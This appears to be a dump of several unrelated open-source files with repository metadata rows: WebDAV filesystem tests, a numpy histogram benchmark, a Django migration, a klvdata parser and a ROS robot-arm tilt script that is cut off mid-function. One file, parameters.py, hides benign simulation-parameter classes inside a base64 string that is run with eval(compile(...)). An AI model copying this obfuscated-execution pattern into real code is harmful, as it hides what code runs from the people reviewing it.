    filesystem._chmod(lpaths['root'], 0o0755)

    file_permissions = [Permission.OWNER_READ, Permission.OWNER_WRITE]
    dir_permissions = file_permissions + [Permission.OWNER_EXECUTE]
    for permission in dir_permissions:
        assert filesystem._has_permission(lpaths['root'], permission)


def test_symlink_to2(webdav_filesystem_quiet: WebdavFileSystem,
                     lpaths_webdav_raises: Dict[str, AbstractPath]) -> None:
    filesystem = webdav_filesystem_quiet
    lpaths = lpaths_webdav_raises

    filesystem._symlink_to(lpaths['new_file'], lpaths['file'])
    assert not filesystem._exists(lpaths['new_file'])


def test_readlink2(webdav_filesystem_quiet: WebdavFileSystem,
                   lpaths_webdav_raises: Dict[str, AbstractPath]) -> None:
    filesystem = webdav_filesystem_quiet
    lpaths = lpaths_webdav_raises

    # raises anyway, since the resource is not a symlink; those don't exist on WebDAV
    with pytest.raises(IOError):
        filesystem._readlink(lpaths['link'], False)
    with pytest.raises(IOError):
        filesystem._readlink(lpaths['link'], True)
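The tests above exercise two policies for filesystem operations that WebDAV cannot express (symlinks, permission bits): either raise `UnsupportedOperationError` or silently do nothing. A toy sketch of that pattern — `FakeWebdavFS` and its constructor flag are hypothetical illustrations, not cerulean's actual API:

```python
class UnsupportedOperationError(RuntimeError):
    pass

class FakeWebdavFS:
    # Illustrates the raises/quiet split: unsupported operations either
    # raise loudly or become no-ops, selected at construction time.
    def __init__(self, unsupported_raises=True):
        self._raises = unsupported_raises

    def _symlink_to(self, link, target):
        if self._raises:
            raise UnsupportedOperationError('WebDAV does not support symlinks')
        # quiet mode: silently ignore the request

FakeWebdavFS(unsupported_raises=False)._symlink_to('a', 'b')  # silently ignored
try:
    FakeWebdavFS()._symlink_to('a', 'b')
    raised = False
except UnsupportedOperationError:
    raised = True
assert raised
```

The quiet variant trades strictness for portability: code written against a POSIX filesystem keeps running on WebDAV, at the cost of silently dropping operations — which is exactly why `test_symlink_to2` above checks that the link was *not* created.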
# Source file: src/westpa/fasthist/__main__.py
# Repository: burntyellow/adelman_ci (MIT)

'''
Created on Jun 25, 2013
@author: mzwier
'''
import numpy
from fasthist import histnd
def _test_double(npts=1024*1024, loops=3):
    from time import time
    mine_times = [None]*loops
    theirs_times = [None]*loops
    # though 1.0 should be sufficient, weirdness in the boundary conditions
    # for numpy.digitize appears to introduce a discrepancy, so throw something
    # greater than 1.0 in for good measure
    binbounds = [[0, 0.5, 1, 1.1] for x in range(3)]
    weights = numpy.random.rand(npts)
    #weights = numpy.ones((npts,), dtype=numpy.float64)
    for n in range(loops):
        testdat = numpy.random.rand(npts, 3)
        mstart = time()
        mine = histnd(testdat, binbounds, weights=weights)
        mstop = time()
        tstart = time()
        theirs = numpy.histogramdd(testdat, binbounds, weights=weights)[0]
        tstop = time()
        mine_times[n] = mstop-mstart
        theirs_times[n] = tstop-tstart
    print(mine)
    print(theirs)
    errsum = numpy.abs(mine-theirs).sum()
    errsum_per_item = errsum / npts
    rel_err = errsum / numpy.abs(weights).sum()
    print('sum of the absolute errors: {} ({} relative, {} per entry)'.format(errsum, rel_err, errsum_per_item))
    print('mine, best of {}: {}'.format(loops, min(mine_times)))
    print('theirs, best of {}: {}'.format(loops, min(theirs_times)))

def _test_float(npts=1024*1024, ndim=3, loops=3):
    from time import time
    mine_times = [None]*loops
    theirs_times = [None]*loops
    binbounds = [[0, 0.5, 1, 1.1] for x in range(ndim)]
    #weights = numpy.random.rand(npts)
    weights = numpy.ones((npts,), dtype=numpy.float64)
    for n in range(loops):
        testdat = numpy.require(numpy.random.rand(npts, ndim), numpy.float32)
        print(testdat)
        mstart = time()
        mine = histnd(testdat, binbounds, weights=weights)
        mstop = time()
        tstart = time()
        theirs = numpy.histogramdd(testdat, binbounds, weights=weights)[0]
        tstop = time()
        mine_times[n] = mstop-mstart
        theirs_times[n] = tstop-tstart
    print(mine)
    print(theirs)
    errsum = numpy.abs(mine-theirs).sum()
    errsum_per_item = errsum / npts
    rel_err = errsum / numpy.abs(weights).sum()
    print('sum of the absolute errors: {} ({} relative, {} per entry)'.format(errsum, rel_err, errsum_per_item))
    print('mine, best of {}: {}'.format(loops, min(mine_times)))
    print('theirs, best of {}: {}'.format(loops, min(theirs_times)))

def _test_uint(npts=1024*1024, ndim=3, loops=3):
    from time import time
    mine_times = [None]*loops
    theirs_times = [None]*loops
    binbounds = [[0, 1, 2, 3, 4] for x in range(ndim)]
    #weights = numpy.random.rand(npts)
    weights = numpy.ones((npts,), dtype=numpy.float64)
    print('binbounds: {}'.format(binbounds))
    print('weights')
    print(weights)
    for n in range(loops):
        testdat = numpy.require(numpy.random.randint(0, 4, size=(npts, ndim)), numpy.uint16)
        print('test data')
        print(testdat)
        mstart = time()
        mine = histnd(testdat, binbounds, weights=weights)
        mstop = time()
        tstart = time()
        theirs = numpy.histogramdd(testdat, binbounds, weights=weights)[0]
        tstop = time()
        mine_times[n] = mstop-mstart
        theirs_times[n] = tstop-tstart
    print(mine)
    print(theirs)
    errsum = numpy.abs(mine-theirs).sum()
    errsum_per_item = errsum / npts
    rel_err = errsum / numpy.abs(weights).sum()
    print('sum of the absolute errors: {} ({} relative, {} per entry)'.format(errsum, rel_err, errsum_per_item))
    print('mine, best of {}: {}'.format(loops, min(mine_times)))
    print('theirs, best of {}: {}'.format(loops, min(theirs_times)))
_test_float(npts=1024*1024,ndim=1) | 36.971154 | 116 | 0.622887 | 508 | 3,845 | 4.627953 | 0.183071 | 0.030625 | 0.033177 | 0.076563 | 0.835815 | 0.835815 | 0.823054 | 0.823054 | 0.823054 | 0.823054 | 0 | 0.027891 | 0.235371 | 3,845 | 104 | 117 | 36.971154 | 0.771769 | 0.087906 | 0 | 0.790123 | 0 | 0 | 0.095851 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.037037 | false | 0 | 0.061728 | 0 | 0.098765 | 0.259259 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
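Each `_test_*` function above follows the same validation pattern: time a candidate histogram implementation, time the reference (`numpy.histogramdd`), then report the summed absolute error. A stdlib-only miniature of that pattern, where `hist1d` is a hypothetical stand-in for `histnd` (it is not part of `fasthist`):

```python
from time import perf_counter
import random

def hist1d(data, edges):
    """Naive 1-D histogram: count samples per [edges[i], edges[i+1]) bin."""
    counts = [0] * (len(edges) - 1)
    for x in data:
        for i in range(len(edges) - 1):
            if edges[i] <= x < edges[i + 1]:
                counts[i] += 1
                break
    return counts

random.seed(0)
data = [random.random() for _ in range(10_000)]
edges = [0, 0.5, 1, 1.1]   # upper edge > 1.0, as in the script above

t0 = perf_counter()
mine = hist1d(data, edges)
elapsed = perf_counter() - t0

# validation step: every sample must land in exactly one bin
assert sum(mine) == len(data)
print('counts={}, took {:.4f}s'.format(mine, elapsed))
```

The same structure scales to the N-dimensional, weighted case the script benchmarks; only the bin-lookup step changes.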
c1b124c1194983eeec4419eca29081105a0a4323 | 5,476 | py | Python | biserici_inlemnite/biserici/migrations/0018_auto_20210731_0202.py | ck-tm/biserici-inlemnite | c9d12127b92f25d3ab2fcc7b4c386419fe308a4e | [
"MIT"
] | null | null | null | biserici_inlemnite/biserici/migrations/0018_auto_20210731_0202.py | ck-tm/biserici-inlemnite | c9d12127b92f25d3ab2fcc7b4c386419fe308a4e | [
"MIT"
] | null | null | null | biserici_inlemnite/biserici/migrations/0018_auto_20210731_0202.py | ck-tm/biserici-inlemnite | c9d12127b92f25d3ab2fcc7b4c386419fe308a4e | [
"MIT"
] | null | null | null | # Generated by Django 3.1.13 on 2021-07-30 23:02
from django.db import migrations, models
import django.db.models.deletion


class Migration(migrations.Migration):

    dependencies = [
        ('nomenclatoare', '0005_boltapestealtar_historicalboltapestealtar_historicaltipboltapestealtar_historicaltipboltapronaos_tip'),
        ('biserici', '0017_auto_20210730_1652'),
    ]

    operations = [
        migrations.AlterModelOptions(
            name='biserica',
            options={'ordering': ['the_order'], 'verbose_name_plural': 'Biserici'},
        ),
        migrations.AddField(
            model_name='biserica',
            name='the_order',
            field=models.PositiveIntegerField(db_index=True, default=0, editable=False),
        ),
        migrations.AddField(
            model_name='historicalbiserica',
            name='the_order',
            field=models.PositiveIntegerField(db_index=True, default=0, editable=False),
        ),
        migrations.AlterField(
            model_name='componentaartistica',
            name='iconostas_naos_altar_detalii',
            field=models.TextField(blank=True, help_text='Particularități ale iconostasului ce merită a fi precizate (de urmărit care este standardul de iconostas în zonă și care sunt eventualele deviații de la standard', null=True, verbose_name='Detalii'),
        ),
        migrations.AlterField(
            model_name='componentaartistica',
            name='iconostas_naos_altar_finisaj',
            field=models.ManyToManyField(blank=True, related_name='iconostasuri_naos_altar', to='nomenclatoare.FinisajIconostas', verbose_name='Finisaj'),
        ),
        migrations.AlterField(
            model_name='componentaartistica',
            name='iconostas_naos_altar_numar_intrari',
            field=models.IntegerField(blank=True, null=True, verbose_name='Număr intrări'),
        ),
        migrations.AlterField(
            model_name='componentaartistica',
            name='iconostas_naos_altar_tip',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='iconostasuri_naos_altar', to='nomenclatoare.tipiconostas', verbose_name='Tip'),
        ),
        migrations.AlterField(
            model_name='componentaartistica',
            name='iconostas_pronaos_naos_detalii',
            field=models.TextField(blank=True, help_text='Particularități ale iconostasului ce merită a fi precizate (de urmărit care este standardul de iconostas în zonă și care sunt eventualele deviații de la standard', null=True, verbose_name='Detalii'),
        ),
        migrations.AlterField(
            model_name='componentaartistica',
            name='iconostas_pronaos_naos_finisaj',
            field=models.ManyToManyField(blank=True, related_name='iconostasuri_pronaos_naos', to='nomenclatoare.FinisajIconostas', verbose_name='Finisaj'),
        ),
        migrations.AlterField(
            model_name='componentaartistica',
            name='iconostas_pronaos_naos_numar_intrari',
            field=models.IntegerField(blank=True, null=True, verbose_name='Număr intrări'),
        ),
        migrations.AlterField(
            model_name='componentaartistica',
            name='iconostas_pronaos_naos_tip',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='iconostasuri_pronaos_naos', to='nomenclatoare.tipiconostas', verbose_name='Tip'),
        ),
        migrations.AlterField(
            model_name='historicalcomponentaartistica',
            name='iconostas_naos_altar_detalii',
            field=models.TextField(blank=True, help_text='Particularități ale iconostasului ce merită a fi precizate (de urmărit care este standardul de iconostas în zonă și care sunt eventualele deviații de la standard', null=True, verbose_name='Detalii'),
        ),
        migrations.AlterField(
            model_name='historicalcomponentaartistica',
            name='iconostas_naos_altar_numar_intrari',
            field=models.IntegerField(blank=True, null=True, verbose_name='Număr intrări'),
        ),
        migrations.AlterField(
            model_name='historicalcomponentaartistica',
            name='iconostas_naos_altar_tip',
            field=models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='nomenclatoare.tipiconostas', verbose_name='Tip'),
        ),
        migrations.AlterField(
            model_name='historicalcomponentaartistica',
            name='iconostas_pronaos_naos_detalii',
            field=models.TextField(blank=True, help_text='Particularități ale iconostasului ce merită a fi precizate (de urmărit care este standardul de iconostas în zonă și care sunt eventualele deviații de la standard', null=True, verbose_name='Detalii'),
        ),
        migrations.AlterField(
            model_name='historicalcomponentaartistica',
            name='iconostas_pronaos_naos_numar_intrari',
            field=models.IntegerField(blank=True, null=True, verbose_name='Număr intrări'),
        ),
        migrations.AlterField(
            model_name='historicalcomponentaartistica',
            name='iconostas_pronaos_naos_tip',
            field=models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='nomenclatoare.tipiconostas', verbose_name='Tip'),
        ),
    ]
| 54.76 | 257 | 0.686085 | 561 | 5,476 | 6.484848 | 0.188948 | 0.039582 | 0.096207 | 0.1116 | 0.876306 | 0.876306 | 0.876306 | 0.865311 | 0.865311 | 0.808411 | 0 | 0.008839 | 0.214938 | 5,476 | 99 | 258 | 55.313131 | 0.837404 | 0.0084 | 0 | 0.784946 | 1 | 0.043011 | 0.367907 | 0.179808 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.021505 | 0 | 0.053763 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
c1e1cdd28bc5e0fe318629a896a4db16ecaf0296 | 11,633 | py | Python | parameters.py | JonDamFlindt/DM562-Rabbits-and-Foxes | a80d3d936b0c7d377db649f83495c24e700446d6 | [
"MIT"
] | null | null | null | parameters.py | JonDamFlindt/DM562-Rabbits-and-Foxes | a80d3d936b0c7d377db649f83495c24e700446d6 | [
"MIT"
] | null | null | null | parameters.py | JonDamFlindt/DM562-Rabbits-and-Foxes | a80d3d936b0c7d377db649f83495c24e700446d6 | [
"MIT"
] | null | null | null | import base64
eval(compile(base64.b64decode(b'class Simulation:
  """
  Describes the simulation setup (the world, the populations of rabbits and
  foxes, and its execution). Instance variables (world, rabbits, foxes, and
  execution) are initialised with an instance of the appropriate class (World,
  Population, or Execution) containing default values for all parameters.
  """

  __slots__ = [
    '_world',
    '_rabbits',
    '_foxes',
    '_execution'
    ]

  def __init__(self):
    self._world = World()
    self._rabbits = Population(
      'rabbits',
      100, # initial_size
      3,   # metabolism
      25,  # max_age
      45,  # max_energy
      .5,  # reproduction_rate
      5,   # reproduction_cost
      10,  # reproduction_age
      )
    self._foxes = Population(
      'foxes',
      30,  # initial_size
      2,   # metabolism
      50,  # max_age
      200, # max_energy
      .5,  # reproduction_rate
      120, # reproduction_cost
      10,  # reproduction_age
      )
    self._execution = Execution()

  @property
  def world(self):
    """
    Parameters for the simulated world. See class World.
    """
    return self._world

  @property
  def rabbits(self):
    """
    Parameters for the rabbit population. See class Population.
    """
    return self._rabbits

  @property
  def foxes(self):
    """
    Parameters for the fox population. See class Population.
    """
    return self._foxes

  @property
  def execution(self):
    """
    Parameters for the simulation execution. See class Execution.
    """
    return self._execution

  def __str__(self) -> str:
    return f"world: {self.world}\n{self.rabbits}\n{self.foxes}\nexecution: {self.execution}"

    
class World:
  """
  Describes the simulated 2D world in its shape (toroid or island) and size.

  See __init__ for defaults.
  """
  
  __slots__ = [
      'is_toroid',
      '_north_south_length',
      '_west_east_length'
      ]

  def __init__(self,
               north_south_length = 20,
               west_east_length = 20,
               is_toroid = True):
    self.is_toroid = is_toroid
    self.north_south_length = north_south_length
    self.west_east_length = west_east_length

  def shape(self) -> str:
    """
    Returns the name of the shape of the world ('toroid' or 'island').
    """
    return 'toroid' if self.is_toroid else 'island'
    
  @property
  def north_south_length(self) -> int:
    """
    The north-south length of the simulated world.
    
    Precondition: integer and non-negative.
    """
    return self._north_south_length

  @north_south_length.setter
  def north_south_length(self,length : int):
    self._north_south_length = length

  @property
  def west_east_length(self) -> int:
    """
    The west-east length of the simulated world.
    
    Precondition: integer and non-negative.
    """
    return self._west_east_length

  @west_east_length.setter
  def west_east_length(self,length : int):
    self._west_east_length = length

  def area(self) -> int:
    """
    Returns the total area of the world.
    """
    return self.north_south_length * self.west_east_length

  def __repr__(self):
    return f"World({self.north_south_length},{self.west_east_length},{self.is_toroid})"

  def __str__(self):
    return f"{self.shape()} {self.north_south_length} by {self.west_east_length}"
    
class Population:
  """
  Describes a population in the simulation (e.g., rabbits).
  """
 
  __slots__ = [
    '_species',
    '_max_age',
    '_metabolism',
    '_max_energy',
    '_initial_size',
    '_reproduction_probability',
    '_reproduction_min_energy',
    '_reproduction_min_age'
    ]

  def __init__(self,
               species,
               initial_size,
               metabolism,
               max_age,
               max_energy,
               reproduction_probability,
               reproduction_min_energy,
               reproduction_min_age):
    """
    Arguments: see the corresponding properties and data descriptors.
    """
    self._species = species
    self.initial_size = initial_size
    self.metabolism = metabolism
    self.max_age = max_age
    self.max_energy = max_energy
    self.reproduction_probability = reproduction_probability
    self.reproduction_min_energy = reproduction_min_energy
    self.reproduction_min_age = reproduction_min_age

  @property
  def species(self) -> str:
    """
    The population species (e.g.,'rabbits').
    """
    return self._species

  @property
  def initial_size(self) -> int:
    """
    The initial size of the populatio.
    
    Precondition: integer between 0 and the avaluable surface area.
    """
    return self._initial_size

  @initial_size.setter
  def initial_size(self,value):
    self._initial_size = value

  @property
  def metabolism(self) -> int:
    """
    The amount of energy consumed during each step of the simulation.

    Precondition: non-negative.
    """
    return self._metabolism

  @metabolism.setter
  def metabolism(self,value):
    self._metabolism = value

  @property
  def max_age(self) -> int:
    """
    The maximum age (in simulation steps) a member of this species can have.
    
    Precondition: integer and positive.
    """
    return self._max_age

  @max_age.setter
  def max_age(self,value):
    self._max_age = value

  @property
  def max_energy(self) -> int:
    """
    The maximum energy level a member of this species can have.

    Precondition: positive.
    """
    return self._max_energy

  @max_energy.setter
  def max_energy(self,value : int):
    self._max_energy = value

  @property
  def reproduction_probability(self) -> float:
    """
    The probability of reproduction when all conditions on age, energy, and environment are met.
    
    Precondition: a floating point value representing a probability.
    """
    return self._reproduction_probability

  @reproduction_probability.setter
  def reproduction_probability(self,value):
    self._reproduction_probability = value

  
  @property
  def reproduction_min_age(self) -> int:
    """
    The minimum age an individual must have in order to reproduce.
    """
    return self._reproduction_min_age

  @reproduction_min_age.setter
  def reproduction_min_age(self,value):
    self._reproduction_min_age = value

  
  @property
  def reproduction_min_energy(self) -> int:
    """
    The minimum energy level an individual must have in order to reproduce.
    """
    return self._reproduction_min_energy

  @reproduction_min_energy.setter
  def reproduction_min_energy(self,value):
    self._reproduction_min_energy = value

  def __repr__(self) -> str:
    return "Population('{}', {}, {}, {}, {}, {}, {}, {})".format(
      self.species,
      self.initial_size,
      self.metabolism,
      self.max_age,
      self.max_energy,
      self.reproduction_probability,
      self.reproduction_min_energy,
      self.reproduction_min_age)

  def __str__(self) -> str:
    return f"""{self.species}: {self.initial_size}
  metabolism:    {self.metabolism}
  max_age:       {self.max_age}
  max_energy:    {self.max_energy}
  reproduction:
    probability: {self.reproduction_probability}
    cost:        {self.reproduction_min_energy}
    age:         {self.reproduction_min_age}"""

class Execution:
  """
  Contains parameters for the simulation execution.

  See __init__ for defaults.
  """
  
  __slots__ = [
      '_max_steps',
      '_step_delay',
      '_batch'
      ]

  def __init__(self,
               max_steps = 1000,
               step_delay = 0.1,
               batch = True):
    self.max_steps = max_steps
    self.step_delay = step_delay
    self.batch = batch

  @property
  def max_steps(self) -> int:
    """
    The maximum number of steps the simulation can run for.
    """
    return self._max_steps

  @max_steps.setter
  def max_steps(self,value):
    self._max_steps = value


  @property
  def step_delay(self) -> float:
    """
    A delay (in seconds) added to each step of the simulation.
    """
    return self._step_delay

  @step_delay.setter
  def step_delay(self,value):
    self._step_delay = value


  @property
  def batch(self) -> bool:
    """
    Whether the simulation executed in batch mode (no visualization) or visualising its status.
    """
    return self._batch

  @batch.setter
  def batch(self,value):
    self._batch = value

  def mode(self) -> str:
    """
    Returns the mode of execution (batch or visual) as a string.
    """
    return 'batch' if self.batch else 'visual'

  def __repr__(self) -> str:
    return f"Execution({self.max_steps},{self.step_delay},{self.batch})"

  def __str__(self) -> str:
    return f"{self.mode()} mode, {self.max_steps} steps with a delay {self.step_delay}s"
'),'<string>','exec'))
| 3,877.666667 | 11,618 | 0.997335 | 19 | 11,633 | 610.631579 | 0.947368 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.107137 | 0.000258 | 11,633 | 2 | 11,619 | 5,816.5 | 0.890456 | 0 | 0 | 0 | 0 | 0 | 0.9951 | 0.994069 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 10 |
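The property docstrings above state preconditions ("integer and positive", "non-negative", a probability in [0, 1]) that the setters never actually check. A minimal sketch of one way to enforce such a precondition in a setter — illustrative only, not how the original module behaves:

```python
class BoundedExecution:
    """Sketch: enforce the documented 'positive integer' precondition on max_steps."""
    __slots__ = ['_max_steps']

    def __init__(self, max_steps=1000):
        self.max_steps = max_steps          # routed through the validating setter

    @property
    def max_steps(self):
        return self._max_steps

    @max_steps.setter
    def max_steps(self, value):
        if not isinstance(value, int) or value <= 0:
            raise ValueError(f"max_steps must be a positive integer, got {value!r}")
        self._max_steps = value

e = BoundedExecution()
try:
    e.max_steps = -5                        # violates the precondition
except ValueError as err:
    print(err)
```

Because `__init__` assigns through the property, invalid constructor arguments are rejected at the same point as later reassignments.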
c1ec5fbd2e336c0d5d939aa3abca8504afb0237a | 254 | py | Python | examples/pprint_stdin.py | stharding/klvdata | e34529c4eba7c8cd00fe56834b623d8e5770f47a | [
"MIT"
] | 6 | 2016-10-21T00:49:27.000Z | 2017-08-31T04:36:38.000Z | examples/pprint_stdin.py | stharding/klvdata | e34529c4eba7c8cd00fe56834b623d8e5770f47a | [
"MIT"
] | null | null | null | examples/pprint_stdin.py | stharding/klvdata | e34529c4eba7c8cd00fe56834b623d8e5770f47a | [
"MIT"
] | 2 | 2017-05-26T10:44:34.000Z | 2017-06-23T22:05:55.000Z | #!/usr/bin/env python3
import sys
import klvdata

for packet in klvdata.StreamParser(sys.stdin.buffer.read()):
    packet.structure()

# Note: this cannot be collapsed into `python -c "import ...; for ..."` on one
# line, since a `for` statement may not follow a `;`. With a literal newline in
# the -c string it works:
#   python -c 'import sys, klvdata
#   for packet in klvdata.StreamParser(sys.stdin.buffer.read()): packet.structure()'
| 36.285714 | 122 | 0.73622 | 35 | 254 | 5.342857 | 0.485714 | 0.096257 | 0.171123 | 0.192513 | 0.748663 | 0.748663 | 0.748663 | 0.748663 | 0.748663 | 0.748663 | 0 | 0.004464 | 0.11811 | 254 | 6 | 123 | 42.333333 | 0.830357 | 0.555118 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 8 |
c1f2c6aac16f1e6f314d67673e2262896c176d04 | 10,865 | py | Python | script/tilt.py | HKUST-RML/Shallow_Depth_Insertion | c2559479285d69a514e81467c5582f6384fc5dc1 | [
"MIT"
] | 3 | 2021-08-19T12:41:16.000Z | 2021-09-09T09:51:50.000Z | script/tilt.py | HKUST-RML/Shallow_Depth_Insertion | c2559479285d69a514e81467c5582f6384fc5dc1 | [
"MIT"
] | null | null | null | script/tilt.py | HKUST-RML/Shallow_Depth_Insertion | c2559479285d69a514e81467c5582f6384fc5dc1 | [
"MIT"
] | 1 | 2022-01-13T08:24:18.000Z | 2022-01-13T08:24:18.000Z | #!/usr/bin/env python
import sys
import math
import rospy
import copy
import numpy as np
import tf
import moveit_commander
import helper
import motion_primitives

moveit_commander.roscpp_initialize(sys.argv)  # initialize the moveit commander
robot = moveit_commander.RobotCommander()  # define the robot
scene = moveit_commander.PlanningSceneInterface()  # define the scene
group = moveit_commander.MoveGroupCommander("manipulator")  # define the planning group (from the moveit packet 'manipulator' planning group)


def tilt(point, axis, angle, velocity):
    '''Tilt primitive motion of robot.

    Parameters:
        point (list): 3-D coordinate of point in rotation axis
        axis (list): 3-D vector of rotation axis (right-hand rule)
        angle (double): angle of tilting
        velocity (double): robot velocity between 0 and 1
    Returns:
    '''
    # Normalize axis vector
    axis = axis/np.linalg.norm(axis)
    # Pose variables. The parameters can be seen from "$ rosmsg show Pose"
    pose_target = group.get_current_pose().pose
    pos_initial = [pose_target.position.x, pose_target.position.y, pose_target.position.z]
    ori_initial = [pose_target.orientation.x, pose_target.orientation.y, pose_target.orientation.z, pose_target.orientation.w]
    # Tilt center point. Closest point from tcp to axis line
    center = np.add(point, np.dot(np.subtract(pos_initial, point), axis)*axis)
    # Closest distance from tcp to axis line
    radius = np.linalg.norm(np.subtract(center, pos_initial))
    # Pair of orthogonal vectors in tilt plane
    v1 = -np.subtract(np.add(center, np.dot(np.subtract(pos_initial, center), axis)*axis), pos_initial)
    v1 = v1/np.linalg.norm(v1)
    v2 = np.cross(axis, v1)
    # Interpolate orientation poses via quaternion slerp
    q = helper.axis_angle2quaternion(axis, angle)
    ori_target = tf.transformations.quaternion_multiply(q, ori_initial)
    ori_waypoints = helper.slerp(ori_initial, ori_target, np.arange(1.0/angle, 1.0+1.0/angle, 1.0/angle))
    waypoints = []
    for t in range(1, angle+1):
        circle = np.add(center, radius*(math.cos(math.radians(t)))*v1 + radius*(math.sin(math.radians(t)))*v2)
        pose_target.position.x = circle[0]
        pose_target.position.y = circle[1]
        pose_target.position.z = circle[2]
        pose_target.orientation.x = ori_waypoints[t-1][0]
        pose_target.orientation.y = ori_waypoints[t-1][1]
        pose_target.orientation.z = ori_waypoints[t-1][2]
        pose_target.orientation.w = ori_waypoints[t-1][3]
        waypoints.append(copy.deepcopy(pose_target))
    (plan, fraction) = group.compute_cartesian_path(waypoints, 0.01, 0)  # waypoints, resolution=1cm, jump_threshold
    retimed_plan = group.retime_trajectory(robot.get_current_state(), plan, velocity)  # Retime trajectory with scaled velocity
    group.execute(retimed_plan)


def active_tilt(point, axis, angle, velocity, active_distance=0.125):
    '''Tilt primitive motion of robot, translating along y while tilting.

    Parameters:
        point (list): 3-D coordinate of point in rotation axis
        axis (list): 3-D vector of rotation axis (right-hand rule)
        angle (double): angle of tilting
        velocity (double): robot velocity between 0 and 1
        active_distance (double): distance to translate along y while tilting
    Returns:
    '''
    # Normalize axis vector
    axis = axis/np.linalg.norm(axis)
    # Pose variables. The parameters can be seen from "$ rosmsg show Pose"
    pose_target = group.get_current_pose().pose
    pos_initial = [pose_target.position.x, pose_target.position.y, pose_target.position.z]
    ori_initial = [pose_target.orientation.x, pose_target.orientation.y, pose_target.orientation.z, pose_target.orientation.w]
    # Tilt center point. Closest point from tcp to axis line
    center = np.add(point, np.dot(np.subtract(pos_initial, point), axis)*axis)
    # Closest distance from tcp to axis line
    radius = np.linalg.norm(np.subtract(center, pos_initial))
    # Pair of orthogonal vectors in tilt plane
    v1 = -np.subtract(np.add(center, np.dot(np.subtract(pos_initial, center), axis)*axis), pos_initial)
    v1 = v1/np.linalg.norm(v1)
    v2 = np.cross(axis, v1)
    # Interpolate orientation poses via quaternion slerp
    q = helper.axis_angle2quaternion(axis, angle)
    ori_target = tf.transformations.quaternion_multiply(q, ori_initial)
    ori_waypoints = helper.slerp(ori_initial, ori_target, np.arange(1.0/angle, 1.0+1.0/angle, 1.0/angle))
    waypoints = []
    for t in range(1, angle+1):
        circle = np.add(center, radius*(math.cos(math.radians(t)))*v1 + radius*(math.sin(math.radians(t)))*v2)
        pose_target.position.x = circle[0]
        pose_target.position.y = circle[1] + active_distance*t/(angle+1)
        pose_target.position.z = circle[2]
        pose_target.orientation.x = ori_waypoints[t-1][0]
        pose_target.orientation.y = ori_waypoints[t-1][1]
        pose_target.orientation.z = ori_waypoints[t-1][2]
        pose_target.orientation.w = ori_waypoints[t-1][3]
        waypoints.append(copy.deepcopy(pose_target))
    (plan, fraction) = group.compute_cartesian_path(waypoints, 0.01, 0)  # waypoints, resolution=1cm, jump_threshold
    retimed_plan = group.retime_trajectory(robot.get_current_state(), plan, velocity)  # Retime trajectory with scaled velocity
    group.execute(retimed_plan)


def tilt_no_wait(point, axis, angle, velocity):
    '''Tilt primitive motion of robot, returning without waiting for execution.

    Parameters:
        point (list): 3-D coordinate of point in rotation axis
        axis (list): 3-D vector of rotation axis (right-hand rule)
        angle (double): angle of tilting
        velocity (double): robot velocity between 0 and 1
    Returns:
        list: the Cartesian waypoints sent for execution
    '''
    # Normalize axis vector
    axis = axis/np.linalg.norm(axis)
    # Pose variables. The parameters can be seen from "$ rosmsg show Pose"
    pose_target = group.get_current_pose().pose
    pos_initial = [pose_target.position.x, pose_target.position.y, pose_target.position.z]
    ori_initial = [pose_target.orientation.x, pose_target.orientation.y, pose_target.orientation.z, pose_target.orientation.w]
    # Tilt center point. Closest point from tcp to axis line
    center = np.add(point, np.dot(np.subtract(pos_initial, point), axis)*axis)
    # Closest distance from tcp to axis line
    radius = np.linalg.norm(np.subtract(center, pos_initial))
    # Pair of orthogonal vectors in tilt plane
    v1 = -np.subtract(np.add(center, np.dot(np.subtract(pos_initial, center), axis)*axis), pos_initial)
    v1 = v1/np.linalg.norm(v1)
    v2 = np.cross(axis, v1)
    # Interpolate orientation poses via quaternion slerp
    q = helper.axis_angle2quaternion(axis, angle)
    ori_target = tf.transformations.quaternion_multiply(q, ori_initial)
    ori_waypoints = helper.slerp(ori_initial, ori_target, np.arange(1.0/angle, 1.0+1.0/angle, 1.0/angle))
    waypoints = []
    for t in range(1, angle+1):
        circle = np.add(center, radius*(math.cos(math.radians(t)))*v1 + radius*(math.sin(math.radians(t)))*v2)
        pose_target.position.x = circle[0]
        pose_target.position.y = circle[1] - (0.005*(float(t)/float(angle+1)))
        pose_target.position.z = circle[2] - (0.005*(float(t)/float(angle+1)))
